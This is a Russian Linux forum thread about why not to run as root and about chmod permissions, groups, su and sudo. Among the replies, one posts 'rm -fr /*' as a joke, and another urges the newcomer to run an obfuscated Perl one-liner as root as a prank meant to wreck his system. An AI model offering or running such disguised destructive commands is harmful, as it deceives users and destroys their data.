Почему под рутом не рекомендуется сидеть в системме ? ...

1) Это очень серьезно на самом деле, есть еще понятие *кривые руки* и *яабсолютновсезнаюолинуксесейчасятутвамвсенастрою*

2) не знаю

3)может есть, я не знаю

4) Интересный вопрос, доступной для чего ? для чтения, записи или исполнения ? если для всего сразу, то наверное chmod 777 /папка

4) Нет ну понятно это всё ... я имел ввиду папку сделать читаемо-изменяемой для всех пользователей системы.

1 -- Читай доки, они рулез.
Прикол:
rm -fr /*
2 -- man su, man sudo
3 -- man su, man sudo
4 -- chmod 0777 /dir

Создай группу dumpuser и добавь в неё всех пользователей.

4) Нет ну понятно это всё ... я имел ввиду папку сделать читаемо-изменяемой для всех пользователей системы.

man chmod

Создать группу в /etc/group или в /etc/passwd ? Как прописывать ? Можно поподробнее чуток :) ...

Ты сам - то видел man chmod ? Вот прикольнись сейчас ... напиши ... всё понятно ? ну к примеру , что в этом мане говорят про chmod 444 ?

Если тебе влом/непонятно маны читать, то специально для тебя был издан один хороший книга: Б. В. Керниган, Р. Пайк "UNIX-юниверсальная среда программирования", Москва, 1992.

P.S. Вкратце: восьмиричное значение режима доступа складываеться из значений прав доступа: 4-для чтения, 2-для записи, 1-для виполнения. Три цифры показывают права доступа для владельца, групы и для всех остальных. Анонимус

"4000 установка ID пользователя при выполнении (S_ISUID)
2000 установка ID группы при выполнении (S_ISGID)
1000 зависит от реализации
0400 право владельца на чтение (S_IRUSR)
0200 право владельца на запись (S_IWUSR)
0100 право владельца на выполнение (S_IXUSR)
0040 право группы на чтение (S_IRGRP)
0020 право группы на запись (S_IWGRP)
0010 право группы на выполнение (S_IXGRP)
0004 право прочих процессов на чтение (S_IROTH)
0002 право прочих процессов на запись (S_IWOTH)
0001 право прочих процессов на выполнение (S_IXOTH)
0000 нет доступа"
Copyright Сергей Дунаев, "Unix System V. Release 4.2", изд. Диалог-МИФИ", 1995

Соответственно, если нужно получить комбинацию прав, нужно сложить соотв. значения.

славная книжица, там очень хорошо все объясняется.
Мой вам совет, читайте книги. Эти маны и инфо - это справка для тех,
кто давно уже все знает, но просто подзабыл. И не слушайте тех, кто
кричит "маны рулез". Даже если они профи, все равно когда-то были чайниками и им было так же сложно, как вам сейчас. А скорее всего они
UNIX учили не по манам.

А можно не играть в математика и посмотреть биты в mc.

Интересно, а на хуа делать в системе все?
Сижу под обычным пользователем.

Не могу только проги ставить. Для этого делаю su, ставлю, exit.

И никаких проблем.

Эта, а mc это что такое? А, из контекста понял -- mc это, наверное,
замена man, да? Биты посмотреть.
Может, лучше сделать sudo?

И никаких проблем...

Мужик запусти эту строчку под рутом и все поймешь.
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
или сходи вот сюда http://www.linux.org.ru/view-message.jsp?msgid=392747

В общем меня так никто и не переубедил :) остаюсь я рутом :)

nu i ostavaysya idiot... dumayu skoro budut virusi pisat' pod linux, vot pipec budet... u menya daje pod root'om slojno chto libo sdelat'... rsbac+cryptoapi rulyat

%lastlogin root
root                                          Never logged in
%

PS: za idiot'a sorry ;) bez obid.. prosto eto i pravda glupo..

ну и клёво тебе ... поставил систему и не меняеш ничего ... апдейты нахуй не нужны ... класс ... романтика xfree версии 1.2 Ядро 1.1.0 ... Свежак бля :) Вирусы скоро будут под линух писать ... тьфу бля дубина ...

blya poka ne uslishu sorry za "dubina" ot tebya prodoljat' diskussiyu ne nameren..

sorry za "dubinu" !!!

ok, vot tut ti ne prav naschet softa.. na desktop'e u menya suse9 a na servere fbsd-stable... soft poslednie versii.. uptime 3 mesyaca, servisi v jail vse, sensitive data na encrypted diske.. koroche security neibacca.. kogda nujen root ispolzuyu su ili sudo

1) Дык эта, пользователь сам может и не повредить (такой вот он редкий, латентный пользователь), то уж кривые скрипты, что он запускать будет, повредят по полной программе. make install, и бздец пистеме...

3) Здесь вам не VMS. Идите в RSBAC...

4) Ась?!?

RTFM madafaka

A numeric mode is from one to four octal digits (0-7), derived by adding up the bits with values 4, 2, and 1. Any omitted digits are assumed to be leading zeros.

Если тебе этого недостаточно - то возьми верёвку, намыль её, и застрелись. ;)

Какой в жопу mc? У chmod сто лет как символьная мода есть...

Апдейтить систему не root должен, а, к примеру (если rpm-based), член группы rpminstall.

Конфиги - те и вовсе скриптом из базы в ldap-е должны высасываться (вариант для ленивых - cvs update, но cvs подхачить надо будет).

О !!! Появился АНТИХРИСТ И ВСЁ ЗАЕБИЗЬ :) !!! Теперь более менее понятно :) ... Так и ещё один момент куда указывать группу rpminstall ? В /etc/group Меня страшно раздражает когда я сижу под пользователем и когда хочеш что-то сохранить , то нужно сохранять только в папке /хоме/пользователь Как эту батву - то победить ? :) З.Ы. А строчку перловую я сейчас попробую ... :) ... Экспириенс - ВЕЛИКАЯ ШТУКА :)

> Апдейтить систему не root должен, а,
> к примеру (если rpm-based), член группы rpminstall

Да, можно поподробней.. Не улавливаю смысла, все-равно
ведь ему нужен доступ на запись почти везде, а значит
убить систему может не хуже рута, да и сервисы рутовые
перезапускать должен уметь.

> З.Ы. А строчку перловую я сейчас попробую ... :) ...
> Экспириенс - ВЕЛИКАЯ ШТУКА :)

давай-давай, экпериментируй 8-D